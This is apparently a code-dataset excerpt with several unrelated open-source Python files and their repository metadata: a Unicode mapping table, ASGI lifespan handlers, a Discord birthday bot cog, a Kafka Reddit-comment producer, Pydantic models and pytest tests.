0x94C9: 0x265E, # 国际象棋白格黑子-马 = ♞
0x94CA: 0x265D, # 国际象棋白格黑子-相 = ♝
0x94CB: 0x265F, # 国际象棋白格黑子-卒 = ♟
0x94EC: 0x2660, # 桥牌-黑桃 = ♠
0x94ED: 0x2665, # 桥牌-红桃 = ♥
0x94EE: 0x2666, # 桥牌-方框 = ♦
0x94EF: 0x2663, # 桥牌-梅花 = ♣
0x95F1: 0x1FA67, # 中国象棋黑子-将 = 🩧
0x95F2: 0x1FA64, # 中国象棋红子-车 = 🩤
0x95F3: 0x1FA63, # 中国象棋红子-马 = 🩣
0x95F4: 0x1FA65, # 中国象棋红子-炮 = 🩥
0x95F5: 0x1FA66, # 中国象棋红子-兵 = 🩦
0x95F6: 0x1FA62, # 中国象棋红子-相 = 🩢
0x95F7: 0x1FA61, # 中国象棋红子-士 = 🩡
0x95F8: 0x1FA60, # 中国象棋红子-帅 = 🩠
0x95F9: 0x1FA6B, # 中国象棋黑子-车 = 🩫
0x95FA: 0x1FA6A, # 中国象棋黑子-马 = 🩪
0x95FB: 0x1FA6C, # 中国象棋黑子-炮 = 🩬
0x95FC: 0x1FA6D, # 中国象棋黑子-卒 = 🩭
0x95FD: 0x1FA68, # 中国象棋黑子-士 = 🩨
0x95FE: 0x1FA69, # 中国象棋黑子-象 = 🩩
0x968F: 0x1D11E, # 其他符号 = 𝄞
0x97A0: 0x4DC0, # 八卦符号 = ䷀
0x97A1: 0x4DC1, # 八卦符号 = ䷁
0x97A2: 0x4DC2, # 八卦符号 = ䷂
0x97A3: 0x4DC3, # 八卦符号 = ䷃
0x97A4: 0x4DC4, # 八卦符号 = ䷄
0x97A5: 0x4DC5, # 八卦符号 = ䷅
0x97A6: 0x4DC6, # 八卦符号 = ䷆
0x97A7: 0x4DC7, # 八卦符号 = ䷇
0x97A8: 0x4DC8, # 八卦符号 = ䷈
0x97A9: 0x4DC9, # 八卦符号 = ䷉
0x97AA: 0x4DCA, # 八卦符号 = ䷊
0x97AB: 0x4DCB, # 八卦符号 = ䷋
0x97AC: 0x4DCC, # 八卦符号 = ䷌
0x97AD: 0x4DCD, # 八卦符号 = ䷍
0x97AE: 0x4DCE, # 八卦符号 = ䷎
0x97AF: 0x4DCF, # 八卦符号 = ䷏
0x97B0: 0x4DD0, # 八卦符号 = ䷐
0x97B1: 0x4DD1, # 八卦符号 = ䷑
0x97B2: 0x4DD2, # 八卦符号 = ䷒
0x97B3: 0x4DD3, # 八卦符号 = ䷓
0x97B4: 0x4DD4, # 八卦符号 = ䷔
0x97B5: 0x4DD5, # 八卦符号 = ䷕
0x97B6: 0x4DD6, # 八卦符号 = ䷖
0x97B7: 0x4DD7, # 八卦符号 = ䷗
0x97B8: 0x4DD8, # 八卦符号 = ䷘
0x97B9: 0x4DD9, # 八卦符号 = ䷙
0x97BA: 0x4DDA, # 八卦符号 = ䷚
0x97BB: 0x4DDB, # 八卦符号 = ䷛
0x97BC: 0x4DDC, # 八卦符号 = ䷜
0x97BD: 0x4DDD, # 八卦符号 = ䷝
0x97BE: 0x4DDE, # 八卦符号 = ䷞
0x97BF: 0x4DDF, # 八卦符号 = ䷟
0x97C0: 0x4DE0, # 八卦符号 = ䷠
0x97C1: 0x4DE1, # 八卦符号 = ䷡
0x97C2: 0x4DE2, # 八卦符号 = ䷢
0x97C3: 0x4DE3, # 八卦符号 = ䷣
0x97C4: 0x4DE4, # 八卦符号 = ䷤
0x97C5: 0x4DE5, # 八卦符号 = ䷥
0x97C6: 0x4DE6, # 八卦符号 = ䷦
0x97C7: 0x4DE7, # 八卦符号 = ䷧
0x97C8: 0x4DE8, # 八卦符号 = ䷨
0x97C9: 0x4DE9, # 八卦符号 = ䷩
0x97CA: 0x4DEA, # 八卦符号 = ䷪
0x97CB: 0x4DEB, # 八卦符号 = ䷫
0x97CC: 0x4DEC, # 八卦符号 = ䷬
0x97CD: 0x4DED, # 八卦符号 = ䷭
0x97CE: 0x4DEE, # 八卦符号 = ䷮
0x97CF: 0x4DEF, # 八卦符号 = ䷯
0x97D0: 0x4DF0, # 八卦符号 = ䷰
0x97D1: 0x4DF1, # 八卦符号 = ䷱
0x97D2: 0x4DF2, # 八卦符号 = ䷲
0x97D3: 0x4DF3, # 八卦符号 = ䷳
0x97D4: 0x4DF4, # 八卦符号 = ䷴
0x97D5: 0x4DF5, # 八卦符号 = ䷵
0x97D6: 0x4DF6, # 八卦符号 = ䷶
0x97D7: 0x4DF7, # 八卦符号 = ䷷
0x97D8: 0x4DF8, # 八卦符号 = ䷸
0x97D9: 0x4DF9, # 八卦符号 = ䷹
0x97DA: 0x4DFA, # 八卦符号 = ䷺
0x97DB: 0x4DFB, # 八卦符号 = ䷻
0x97DC: 0x4DFC, # 八卦符号 = ䷼
0x97DD: 0x4DFD, # 八卦符号 = ䷽
0x97DE: 0x4DFE, # 八卦符号 = ䷾
0x97DF: 0x4DFF, # 八卦符号 = ䷿
0x97E0: 0x2630, # 八卦符号 = ☰
0x97E1: 0x2637, # 八卦符号 = ☷
0x97E2: 0x2633, # 八卦符号 = ☳
0x97E3: 0x2634, # 八卦符号 = ☴
0x97E4: 0x2635, # 八卦符号 = ☵
0x97E5: 0x2632, # 八卦符号 = ☲
0x97E6: 0x2636, # 八卦符号 = ☶
0x97E7: 0x2631, # 八卦符号 = ☱
0x97EF: 0x2A0D, # 积分主值 = ⨍
0x97F0: 0x0274, # 国际音标 = ɴ
0x97F1: 0x0280, # 国际音标 = ʀ
0x97F2: 0x97F2, # 国际音标(ɔ̃)
0x97F3: 0x97F3, # 国际音标(ɛ̃)
0xA080: 0x00B7, # 外文间隔点 = ·
0xA08E: 0x2039, # 外文左单书名号 = ‹
0xA08F: 0x203A, # 外文右单书名号 = ›
0xA090: 0x00AB, # 外文左双书名号 = «
0xA091: 0x00BB, # 外文右双书名号 = »
0xBD8A: 0x2201, # 补集 = ∁
0xBD8B: 0x2115, # 集合符号N = ℕ
0xBD8C: 0x2124, # 集合符号Z = ℤ
0xBD8D: 0x211A, # 集合符号Q = ℚ
0xBD8E: 0x211D, # 集合符号R = ℝ
0xBD8F: 0x2102, # 集合符号C = ℂ
0xBD90: 0x00AC, # 否定符号 = ¬
0xBD93: 0xBD93, # 不属于(∈ + \)
0xBD94: 0xBD94, # 不属于(∈ + |)
0xBD95: 0x220B, # 属于 = ∋
0xBD96: 0x220C, # 不属于 = ∌
0xBD97: 0xBD97, # 不属于(∋ + |)
0xBD98: 0xBD98, # 不属于(∌ + \)
0xBD99: 0x22FD, # 不属于 = ⋽
0xBD9A: 0xBD9A, # 不等于(= + \)
0xBD9B: 0x1d463 # 𝑣
})
| 28.744308 | 88 | 0.518268 |
c933cadd6174b03b61565756a1609302c0c6bfc6 | 6,176 | py | Python | moona/lifespan/handlers.py | katunilya/mona | 8f44a9e06910466afbc9b2bcfb42144dcd25ed5a | [
"MIT"
] | 2 | 2022-03-26T15:27:31.000Z | 2022-03-28T22:00:32.000Z | moona/lifespan/handlers.py | katunilya/mona | 8f44a9e06910466afbc9b2bcfb42144dcd25ed5a | [
"MIT"
] | null | null | null | moona/lifespan/handlers.py | katunilya/mona | 8f44a9e06910466afbc9b2bcfb42144dcd25ed5a | [
"MIT"
] | null | null | null | from __future__ import annotations
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, TypeVar
from pymon import Future, Pipe, cmap, creducel, hof_2, this_async
from pymon.core import returns_future
from moona.lifespan import LifespanContext
LifespanFunc = Callable[[LifespanContext], Future[LifespanContext | None]]
_LifespanHandler = Callable[
[LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
def compose(h1: _LifespanHandler, h2: _LifespanHandler) -> LifespanHandler:
"""Compose 2 `LifespanHandler`s into one.
Args:
h1 (_LifespanHandler): to run first.
h2 (_LifespanHandler): to run second.
Returns:
LifespanHandler: resulting handler.
"""
def handler(
final: LifespanFunc, ctx: LifespanContext
) -> Future[LifespanContext | None]:
_h1 = hof_2(h1)
_h2 = hof_2(h2)
func = _h1(_h2(final))
return func(ctx)
return LifespanHandler(handler)
@dataclass(frozen=True, slots=True)
class LifespanHandler:
"""Abstraction over function that hander `LifespanContext`."""
_handler: Callable[[LifespanContext], Future[LifespanContext | None]]
def __call__( # noqa
self, nxt: LifespanFunc, ctx: LifespanContext
) -> Future[LifespanContext | None]:
return returns_future(self._handler)(nxt, ctx)
def __init__(self, handler: _LifespanHandler) -> None:
object.__setattr__(self, "_handler", handler)
def compose(self, h: _LifespanHandler) -> LifespanHandler:
"""Compose 2 `LifespanHandler`s into one.
Args:
h2 (_LifespanHandler): to run next.
Returns:
LifespanHandler: resulting handler.
"""
return compose(self, h)
def __rshift__(self, h: _LifespanHandler) -> LifespanHandler:
return compose(self, h)
A = TypeVar("A")
B = TypeVar("B")
C = TypeVar("C")
def handler(func: _LifespanHandler) -> LifespanHandler:
"""Decorator that converts function to LifespanHandler callable."""
return LifespanHandler(func)
def handle_func(func: LifespanFunc) -> LifespanHandler:
"""Converts `LifespanFunc` to `LifespanHandler`.
Args:
func (LifespanFunc): to convert to `LifespanHandler`.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match await func(ctx):
case None:
return None
case LifespanContext() as _ctx:
return await nxt(_ctx)
return _handler
def handle_func_sync(
func: Callable[[LifespanContext], LifespanContext | None]
) -> LifespanHandler:
"""Converts sync `LifespanFunc` to `LifespanHandler`.
Args:
func (Callable[[LifespanContext], LifespanContext | None]): to convert to
`LifespanHandler`.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match func(ctx):
case None:
return None
case LifespanContext() as _ctx:
return await nxt(_ctx)
return _handler
def __choose_reducer(f: LifespanFunc, s: LifespanFunc) -> LifespanFunc:
@returns_future
async def func(ctx: LifespanContext) -> LifespanFunc:
_ctx = deepcopy(ctx)
match await f(_ctx):
case None:
return await s(ctx)
case some:
return some
return func
def choose(handlers: list[LifespanHandler]) -> LifespanHandler:
"""Iterate though handlers till one would return some `LifespanContext`.
Args:
handlers (list[LifespanHandler]): to iterate through.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match handlers:
case []:
return await nxt(ctx)
case _:
func: LifespanFunc = (
Pipe(handlers)
.then(cmap(hof_2))
.then(cmap(lambda h: h(nxt)))
.then(creducel(__choose_reducer))
.finish()
)
return await func(ctx)
return _handler
def handler1(
func: Callable[[A, LifespanFunc, LifespanContext], Future[LifespanContext | None]]
) -> Callable[[A], LifespanHandler]:
"""Decorator for LifespanHandlers with 1 additional argument.
Makes it "curried".
"""
def wrapper(a: A) -> LifespanHandler:
return LifespanHandler(lambda nxt, ctx: func(a, nxt, ctx))
return wrapper
def handler2(
func: Callable[
[A, B, LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
) -> Callable[[A, B], LifespanHandler]:
"""Decorator for LifespanHandlers with 2 additional arguments.
Makes it "curried".
"""
def wrapper(a: A, b: B) -> LifespanHandler:
return LifespanHandler(lambda nxt, ctx: func(a, b, nxt, ctx))
return wrapper
def handler3(
func: Callable[
[A, B, C, LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
) -> Callable[[A, B, C], LifespanHandler]:
"""Decorator for LifespanHandlers with 1 additional argument.
Makes it "curried".
"""
def wrapper(a: A, b: B, c: C) -> LifespanHandler:
return LifespanHandler(lambda nxt, ctx: func(a, b, c, nxt, ctx))
return wrapper
def skip(_: LifespanContext) -> Future[None]:
"""`LifespanFunc` that skips pipeline by returning `None` instead of context.
Args:
_ (LifespanContext): ctx we don't care of.
Returns:
Future[None]: result.
"""
return Future(this_async(None))
def end(ctx: LifespanContext) -> Future[LifespanContext]:
"""`LifespanFunc` that finishes the pipeline of request handling.
Args:
ctx (LifespanContext): to end.
Returns:
Future[LifespanContext]: ended ctx.
"""
return Future(this_async(ctx))
| 25.841004 | 86 | 0.629858 |
c9340f2d3c1db26d4655357d65aa1d342c92a30f | 4,246 | py | Python | bot/cogs/birthday/birthday.py | Qtopia-Team/luci | 9b7f1966050910d50f04cbd9733d1c77ffbb8cba | [
"MIT"
] | 5 | 2021-04-27T10:50:54.000Z | 2021-08-02T09:11:56.000Z | bot/cogs/birthday/birthday.py | Qtopia-Team/luci | 9b7f1966050910d50f04cbd9733d1c77ffbb8cba | [
"MIT"
] | 2 | 2021-06-17T14:53:13.000Z | 2021-06-19T02:14:36.000Z | bot/cogs/birthday/birthday.py | luciferchase/luci | 91e30520cfc60177b9916d3f3d41678f590ecdfc | [
"MIT"
] | 4 | 2021-06-11T12:02:42.000Z | 2021-06-30T16:56:46.000Z | import discord
from discord.ext import commands
import json
import os
import psycopg2
import pytz
class Birthday(commands.Cog):
"""Never forget birthday of your friends"""
def __init__(self):
# Set up database
DATABASE_URL = os.environ["DATABASE_URL"]
self.dbcon = psycopg2.connect(DATABASE_URL, sslmode = "require")
self.cursor = self.dbcon.cursor()
# Make a table if not already made
query = """CREATE TABLE IF NOT EXISTS bday(
id BIGINT NOT NULL PRIMARY KEY,
guild_id BIGINT NOT NULL,
bday_date INT NOT NULL,
bday_month INT NOT NULL,
tz TEXT NOT NULL
)"""
self.cursor.execute(query)
self.dbcon.commit()
@commands.guild_only()
@commands.group(invoke_without_command = True)
async def bday(self, ctx):
"""To set your bday type `luci bday set`
If you want to edit a bday type `luci bday edit`"""
pass
@bday.command(name = "set")
async def setbday(self, ctx, member: discord.Member, date, tz = "UTC"):
"""Usage: luci bday set @Lucifer Chase 27/02 kolkata
If you don't care about the timezone thing leave it blank"""
date = date.split("/")
for i in range(2):
if (date[i][0] == 0):
date[i] = date[i][1]
correct_date = True
if (date[0] > 31 or date[0] < 0 or date[1] > 12 or date[0] < 0):
correct_date = False
if (date[0] > 30 and date[1] not in [1, 3, 5, 7, 8, 10, 12]):
correct_date = False
elif (date[1] == 2 and date[0] > 27):
correct_date = False
if (not correct_date):
await ctx.send("Bruh! My expectation from you was low but holy shit!")
bday_date, bday_month = date
if (tz != "UTC"):
list_of_timezones = list(pytz.all_timezones)
for i in range(len(list_of_timezones)):
if (tz.title() in list_of_timezones[i]):
tz = list_of_timezones[i]
break
else:
await ctx.send("Uh oh! Timezone not found 👀")
await ctx.send("You can check list of timezones using `luci timezones [continent name]`")
return
try:
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(member.id))
self.dbcon.commit()
except:
pass
query = f"""INSERT INTO bday VALUES
({member.id}, {member.guild.id}, {bday_date}, {bday_month}, '{tz}')"""
try:
self.cursor.execute(query)
self.dbcon.commit()
except Exception as error:
await ctx.send(f"```css\n{error}```")
await ctx.send(str("Are you doing everything correctly?" +
"Might want to check usage `luci help bday set`" +
"Or if the problem persists ping `@Lucifer Chase`"))
else:
embed = discord.Embed(title = "Success! <a:nacho:839499460874862655>", color = 0x00FFFF)
embed.add_field(name = "Member", value = member.nick)
embed.add_field(name = "Date", value = "/".join(date))
embed.add_field(name = "Timezone", value = tz)
await ctx.send(embed = embed)
@bday.command(name = "delete")
async def bdaydelete(self, ctx):
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(ctx.author.id))
self.dbcon.commit()
@commands.command()
@commands.is_owner()
async def showbday(self, ctx):
self.cursor.execute("SELECT * FROM bday")
data = self.cursor.fetchall()
await ctx.send("```css\n{}```".format(json.dumps(data[len(data)//2:], indent = 1)))
await ctx.send("```css\n{}```".format(json.dumps(data[:len(data)//2], indent = 1)))
not_redundant = []
redundant = []
for i in data:
if (i[0] not in not_redundant):
not_redundant.append(i[0])
else:
redundant.append(i[0])
await ctx.send("```css\n{}```".format(json.dumps(redundant, indent = 2))) | 35.090909 | 105 | 0.544277 |
c934c6f917f8d18513144569e61a6ad4e232777a | 651 | py | Python | apps/main/proc_scraper.py | suenklerhaw/seoeffekt | 0a31fdfa1a7246da37e37bf53c03d94c5f13f095 | [
"MIT"
] | 1 | 2022-02-15T14:03:10.000Z | 2022-02-15T14:03:10.000Z | apps/main/proc_scraper.py | suenklerhaw/seoeffekt | 0a31fdfa1a7246da37e37bf53c03d94c5f13f095 | [
"MIT"
] | null | null | null | apps/main/proc_scraper.py | suenklerhaw/seoeffekt | 0a31fdfa1a7246da37e37bf53c03d94c5f13f095 | [
"MIT"
] | null | null | null | #sub processes to scrape using the normal Google scraper
#include libs
import sys
sys.path.insert(0, '..')
from include import *
def save_sources():
call(["python3", "job_save_sources.py"])
def scraper():
call(["python3", "job_scraper.py"])
def reset_scraper():
call(["python3", "job_reset_scraper.py"])
def reset_sources():
call(["python3", "job_reset_sources.py"])
process1 = threading.Thread(target=scraper)
process2 = threading.Thread(target=save_sources)
process3 = threading.Thread(target=reset_scraper)
process4 = threading.Thread(target=reset_sources)
process1.start()
process2.start()
process3.start()
process4.start()
| 22.448276 | 56 | 0.738863 |
c9359b5500958801527c3395149655f6f66f2d7a | 1,620 | py | Python | ingestion/producer1.py | aspk/ratsadtarget | e93cd3f71000ec409e79e6e0c873578f0e8fa8b3 | [
"Apache-2.0"
] | 1 | 2020-03-03T18:46:15.000Z | 2020-03-03T18:46:15.000Z | ingestion/producer1.py | Keyology/ratsadtarget | e93cd3f71000ec409e79e6e0c873578f0e8fa8b3 | [
"Apache-2.0"
] | null | null | null | ingestion/producer1.py | Keyology/ratsadtarget | e93cd3f71000ec409e79e6e0c873578f0e8fa8b3 | [
"Apache-2.0"
] | 1 | 2020-03-03T18:46:18.000Z | 2020-03-03T18:46:18.000Z | # producer to stream data into kafka
from boto.s3.connection import S3Connection
import datetime
import json
import bz2
from kafka import KafkaProducer
from kafka.errors import KafkaError
import time
import pytz
conn = S3Connection()
key = conn.get_bucket('aspk-reddit-posts').get_key('comments/RC_2017-11.bz2')
producer = KafkaProducer(bootstrap_servers=['10.0.0.5:9092'])
count = 0
decomp = bz2.BZ2Decompressor()
CHUNK_SIZE= 5000*1024
timezone = pytz.timezone("America/Los_Angeles")
start_time = time.time()
while True:
print('in')
chunk = key.read(CHUNK_SIZE)
if not chunk:
break
data = decomp.decompress(chunk).decode()
for i in data.split('\n'):
try:
count+=1
if count%10000==0 and count!=0:
print('rate of kafka producer messages is {}'.format(count/(time.time()-start_time)))
comment = json.loads(i)
reddit_event = {}
reddit_event['post'] = comment['permalink'].split('/')[-3]
reddit_event['subreddit'] = comment['subreddit']
reddit_event['timestamp'] = str(datetime.datetime.fromtimestamp(time.time()))
reddit_event['body'] = comment['body']
reddit_event['author'] = comment['author']
producer.send('reddit-stream-topic', bytes(json.dumps(reddit_event),'utf-8'))
producer.flush()
# to reduce speed use time.sleep(0.01)
#time.sleep(0.001)
except:
print('Incomplete string ... skipping this comment')
#break
| 33.061224 | 105 | 0.608642 |
c9378ebb2e19a75b65829de15453b31293aca652 | 3,060 | py | Python | src/odin-http/odin/http/models.py | wenshuoliu/odin | 7998ee7541b3de44dd149899168983e964f2b8f7 | [
"Apache-2.0"
] | 4 | 2020-12-15T15:57:14.000Z | 2020-12-16T21:52:23.000Z | src/odin-http/odin/http/models.py | wenshuoliu/odin | 7998ee7541b3de44dd149899168983e964f2b8f7 | [
"Apache-2.0"
] | 2 | 2021-03-15T02:49:56.000Z | 2021-03-27T12:42:38.000Z | src/odin-http/odin/http/models.py | wenshuoliu/odin | 7998ee7541b3de44dd149899168983e964f2b8f7 | [
"Apache-2.0"
] | 5 | 2020-12-15T19:09:00.000Z | 2021-04-21T20:40:38.000Z | #from pydantic import BaseModel as Model
# This gives us backwards compatible API calls
from fastapi_camelcase import CamelModel as Model
from typing import Optional, List
from datetime import date, datetime
class UserDefinition(Model):
username: str
password: Optional[str] = None
firstname: Optional[str] = None
lastname: Optional[str] = None
class UserWrapperDefinition(Model):
user: UserDefinition
class UserResults(Model):
users: List[UserDefinition]
class EventDefinition(Model):
id: str
event_type: str
reason: Optional[str] = None
source: Optional[str] = None
message: Optional[str] = None
timestamp: Optional[datetime] = None
class KeyValueDefinition(Model):
key: str
value: str
class VolumeMountDefinition(Model):
path: str
name: str
claim: str
class EventResults(Model):
events: List[EventDefinition]
class TaskDefinition(Model):
id: str
name: str
image: str
command: str
args: List[str] = []
mounts: List[VolumeMountDefinition] = []
num_gpus: Optional[int]
pull_policy: str
node_selector: List[KeyValueDefinition] = []
resource_type: str
num_workers: Optional[int]
depends: List[str] = []
inputs: List[str] = []
outputs: List[str] = []
class TaskStatusDefinition(Model):
id: str
task: str
name: str
status: str
command: str
image: str
resource_type: str
resource_id: str
submit_time: Optional[datetime]
completion_time: Optional[datetime]
events: List[EventDefinition] = []
class PipelineDefinition(Model):
id: Optional[str]
job: str
version: Optional[str]
tasks: List[TaskStatusDefinition] = []
name: Optional[str]
status: Optional[str]
message: Optional[str]
submit_time: Optional[datetime] = None
completion_time: Optional[datetime] = None
class PipelineWrapperDefinition(Model):
pipeline: Optional[PipelineDefinition] = None
context: dict = []
class PipelineResults(Model):
pipelines: List[PipelineDefinition] = []
class PipelineCleanupDefinition(Model):
task_id: str
cleaned_from_k8s: Optional[bool] = True
purged_from_db: Optional[bool] = False
removed_from_fs: Optional[bool] = False
class PipelineCleanupResults(Model):
cleanups: List[PipelineCleanupDefinition] = []
class ConfigDefinition(Model):
id: str
name: str
content: str
class JobDefinition(Model):
id: Optional[str] = None
name: str
location: Optional[str] = None
creation_time: Optional[datetime]
tasks: List[TaskDefinition] = []
configs: List[ConfigDefinition] = []
class JobWrapperDefinition(Model):
job: Optional[JobDefinition] = None
class JobResults(Model):
jobs: List[JobDefinition] = []
class UploadDefinition(Model):
bytes: int
location: str
class AuthResponseDefinition(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
message: Optional[str] = None
| 21.103448 | 80 | 0.693137 |
c9380c3f618a01051fb6b644e3bcd12fce9edfdc | 7,931 | py | Python | tests/test_data/test_data_core.py | shaoeric/hyperparameter_hunter | 3709d5e97dd23efa0df1b79982ae029789e1af57 | [
"MIT"
] | 688 | 2018-06-01T23:43:28.000Z | 2022-03-23T06:37:20.000Z | tests/test_data/test_data_core.py | shaoeric/hyperparameter_hunter | 3709d5e97dd23efa0df1b79982ae029789e1af57 | [
"MIT"
] | 188 | 2018-07-09T23:22:31.000Z | 2021-04-01T07:43:46.000Z | tests/test_data/test_data_core.py | shaoeric/hyperparameter_hunter | 3709d5e97dd23efa0df1b79982ae029789e1af57 | [
"MIT"
] | 100 | 2018-08-28T03:30:47.000Z | 2022-01-25T04:37:11.000Z | ##################################################
# Import Own Assets
##################################################
from hyperparameter_hunter.data.data_core import BaseDataChunk, BaseDataset, NullDataChunk
##################################################
# Import Miscellaneous Assets
##################################################
import pandas as pd
import pytest
from unittest import mock
##################################################
# White-Box/Structural Test Fixtures
##################################################
@pytest.fixture(scope="module")
def null_chunk_fixture():
"""Boring fixture that creates an instance of :class:`data.data_core.NullDataChunk`"""
return NullDataChunk()
@pytest.fixture(scope="module")
def base_dataset_fixture():
"""Boring fixture that creates an instance of :class:`data.data_core.BaseDataset`"""
return BaseDataset(None, None)
##################################################
# White-Box/Structural Tests
##################################################
@mock.patch("hyperparameter_hunter.data.data_core.NullDataChunk._on_call_default")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_callback_method_invocation(mock_on_call_default, point, division, null_chunk_fixture):
"""Test that calling any primary callback methods of :class:`data.data_core.NullDataChunk`
results in a call to :meth:`data.data_core.BaseDataCore._on_call_default` with the appropriate
`division` and `point` arguments. Using `on_fold_end` as an example, this function ensures::
`on_fold_end(...)` call -> `_on_call_default("fold", "end", ...)` call"""
null_chunk_fixture.__getattribute__(f"on_{division}_{point}")("An arg", k="A kwarg")
mock_on_call_default.assert_called_once_with(division, point, "An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_do_something_invocation(point, division, null_chunk_fixture):
"""Test that calling :meth:`data.data_core.NullDataChunk._do_something` results in the invocation
of the proper primary callback method as specified by `division` and `point`. Using
`on_fold_end` as an example, this function ensures::
`_do_something("fold", "end", ...)` call -> `on_fold_end(...)` call"""
method_to_mock = f"on_{division}_{point}"
mock_method_path = f"hyperparameter_hunter.data.data_core.NullDataChunk.{method_to_mock}"
with mock.patch(mock_method_path) as mock_primary_callback:
null_chunk_fixture._do_something(division, point, "An arg", k="A kwarg")
mock_primary_callback.assert_called_once_with("An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_kind_chunk_invocation(point, division, base_dataset_fixture):
"""Test that calling :meth:`data.data_core.BaseDataset._do_something` results in the invocation
of the proper callback method of :class:`data.data_core.BaseDataChunk` three times (once for
`input`, `target` and `prediction`). Using `on_fold_end` as an example, this function ensures::
`_do_something("fold", "end", ...)` `BaseDataset` call ->
`on_fold_end(...)` call (`input` chunk)
`on_fold_end(...)` call (`target` chunk)
`on_fold_end(...)` call (`prediction` chunk)"""
method_to_mock = f"on_{division}_{point}"
mock_method_path = f"hyperparameter_hunter.data.data_core.BaseDataChunk.{method_to_mock}"
with mock.patch(mock_method_path) as mock_primary_callback:
base_dataset_fixture._do_something(division, point, "An arg", k="A kwarg")
mock_primary_callback.assert_has_calls([mock.call("An arg", k="A kwarg")] * 3)
##################################################
# `BaseDataChunk` Equality
##################################################
def _update_data_chunk(updates: dict):
chunk = BaseDataChunk(None)
for key, value in updates.items():
if key.startswith("T."):
setattr(chunk.T, key[2:], value)
else:
setattr(chunk, key, value)
return chunk
@pytest.fixture()
def data_chunk_fixture(request):
return _update_data_chunk(getattr(request, "param", dict()))
@pytest.fixture()
def another_data_chunk_fixture(request):
return _update_data_chunk(getattr(request, "param", dict()))
#################### Test Scenario Data ####################
df_0 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]))
df_1 = pd.DataFrame(dict(a=[1, 2, 3], b=[999, 5, 6]))
df_2 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]), index=["foo", "bar", "baz"])
df_3 = pd.DataFrame(dict(a=[1, 2, 3], c=[4, 5, 6]), index=["foo", "bar", "baz"])
df_4 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6], c=[7, 8, 9]))
chunk_data_0 = dict(d=pd.DataFrame())
chunk_data_1 = dict(d=pd.DataFrame(), fold=df_0)
chunk_data_2 = dict(d=pd.DataFrame(), fold=df_1)
chunk_data_3 = dict(d=pd.DataFrame(), fold=df_2)
chunk_data_4 = {"d": pd.DataFrame(), "fold": df_2, "T.fold": df_3}
chunk_data_5 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2}
chunk_data_6 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2, "T.d": df_4}
@pytest.mark.parametrize(
["data_chunk_fixture", "another_data_chunk_fixture"],
[
[dict(), dict()],
[chunk_data_0, chunk_data_0],
[chunk_data_1, chunk_data_1],
[chunk_data_2, chunk_data_2],
[chunk_data_3, chunk_data_3],
[chunk_data_4, chunk_data_4],
[chunk_data_5, chunk_data_5],
[chunk_data_6, chunk_data_6],
],
indirect=True,
)
def test_data_chunk_equality(data_chunk_fixture, another_data_chunk_fixture):
assert data_chunk_fixture == another_data_chunk_fixture
#################### Inequality Tests ####################
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_0(data_chunk_fixture):
assert _update_data_chunk(chunk_data_0) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_1(data_chunk_fixture):
assert _update_data_chunk(chunk_data_1) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_2(data_chunk_fixture):
assert _update_data_chunk(chunk_data_2) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_3(data_chunk_fixture):
assert _update_data_chunk(chunk_data_3) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_4(data_chunk_fixture):
assert _update_data_chunk(chunk_data_4) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_5(data_chunk_fixture):
assert _update_data_chunk(chunk_data_5) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5],
indirect=True,
)
def test_data_chunk_inequality_6(data_chunk_fixture):
assert _update_data_chunk(chunk_data_6) != data_chunk_fixture
| 40.258883 | 102 | 0.667381 |
c939aef00a062e0b98f7c418e70663b8692f035d | 108 | py | Python | sample/sample.py | eaybek/getthat | 3ca34902f773ec6a40a1df0b7dac5845a22cc8e4 | [
"MIT"
] | null | null | null | sample/sample.py | eaybek/getthat | 3ca34902f773ec6a40a1df0b7dac5845a22cc8e4 | [
"MIT"
